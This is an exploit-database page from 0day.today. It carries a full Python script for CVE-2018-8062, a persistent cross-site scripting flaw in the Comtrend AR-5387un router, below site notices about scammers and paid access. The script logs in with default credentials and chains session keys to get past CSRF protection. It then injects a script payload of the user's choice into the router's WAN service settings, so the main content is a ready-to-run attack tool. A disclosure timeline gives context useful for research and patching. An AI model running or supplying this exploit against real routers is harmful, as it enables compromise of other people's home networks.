0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Comtrend AR-5387un router - Persistent XSS (Authenticated) Exploit
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Exploit Title: Persistent XSS on Comtrend AR-5387un router Date: 19/10/2020 Exploit Author: OscarAkaElvis Vendor Homepage: https://www.comtrend.com/ Version: Comtrend AR-5387un router Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i CVE: CVE-2018-8062 Disclosure timeline: 08/03/2018: Vulnerability was discovered 10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062) 11/03/2018: Mitre answered, CVE number reserved 11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered 16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233) 18/10/2020: Exploit creation 19/10/2020: Exploit sent to exploit-db Exploitation explanation: To exploit this vulnerability, once logged into the router, a WAN service must be created Click on "Advanced Setup", "WAN Service". "Add button", "Next" Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script> Then click on "Next" four times to go on through the steps and finally click on "Apply/Save" The result of the XSS will be displayed and triggered on the WAN services page This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload Happy hacking :) OscarAkaElvis - https://twitter.com/OscarAkaElvis """ # Dependencies and libraries import requests from requests.auth import HTTPBasicAuth import re from sys import argv, exit import argparse from os import path from time import sleep class Exploit(object): # Global class vars session = requests.Session() user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36" ip = None username = None password = None payload = None default_ip = "192.168.1.1" default_username = "admin" default_password = "admin" default_payload = "<script>alert('xss');</script>" exploit_version = "1.0" current_sessionkey = None referer_sessionkey = None script_name = path.basename(argv[0]) description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router' epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\'' def start_msg(self): print("[*] Starting CVE-2018-8062 exploit...") sleep(0.5) def check_params(self, arguments): parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text) parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP') parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME') parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD') parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD') parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit") args = parser.parse_args(arguments) self.start_msg() print("[*] Launch the exploit using -h argument to check all the available options") print() if not args.ip: self.ip = self.default_ip print("[!] Warning, no ip set, default will be used: " + str(self.ip)) else: self.ip = args.ip if not args.username: self.username = self.default_username print("[!] Warning, no username set, default will be used: " + str(self.username)) else: self.username = args.username if not args.password: self.password = self.default_password print("[!] Warning, no password set, default will be used: " + str(self.password)) else: self.password = args.password if not args.payload: self.payload = self.default_payload print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload)) else: self.password = args.password def print_version(self): print() return 'v{}'.format(self.exploit_version) def check_router(self): try: print() print("[*] Trying to detect router...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers) if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)): print("[+] Comtrend router detected successfully") else: print() print("[-] It seems the target is not a Comtrend router") print("[*] Exiting...") exit(1) except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError): print() print("[-] Can't connect to the router") print("[*] Exiting...") exit(1) def check_login(self): print() print("[*] Trying to login...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) if response.status_code != 401: print("[+] Login successfully!") sleep(1) else: print() print("[-] Can't login into the router. Check your creds!") print("[*] Exiting...") exit(1) def get_sessionKey(self, response_text): sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text)) if sessionKey is not None: sessionKey = sessionKey.group(1) else: sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE) if sessionKey is not None: sessionKey = sessionKey.group(1) return sessionKey def step1(self): print() print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.current_sessionkey = self.get_sessionKey(response.content) print("[+] Success! Initial sessionKey: " + self.current_sessionkey) sleep(1) def step2(self): print() print("[*] Performing step 2/8...") paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"} response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step3(self): print() print("[*] Performing step 3/8...") paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step4(self): print() print("[*] Performing step 4/8...") paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step5(self): print() print("[*] Performing step 5/8...") paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step6(self): print() print("[*] Performing step 6/8...") paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step7(self): print() print("[*] Performing step 7/8...") paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def final_step8(self): print() print("[*] Performing final step 8/8. Deploying XSS payload...") paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey} self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) print() print("[+] XSS payload deployed successfully") print("[+] Happy hacking :) . Author: OscarAkaElvis") @staticmethod def main(self, arguments): self.check_params(arguments) self.check_router() self.check_login() self.step1() self.step2() self.step3() self.step4() self.step5() self.step6() self.step7() self.final_step8() exit(0) if __name__ == '__main__': ImportObject = Exploit() ImportObject.main(ImportObject, argv[1:]) # 0day.today [2024-12-24] #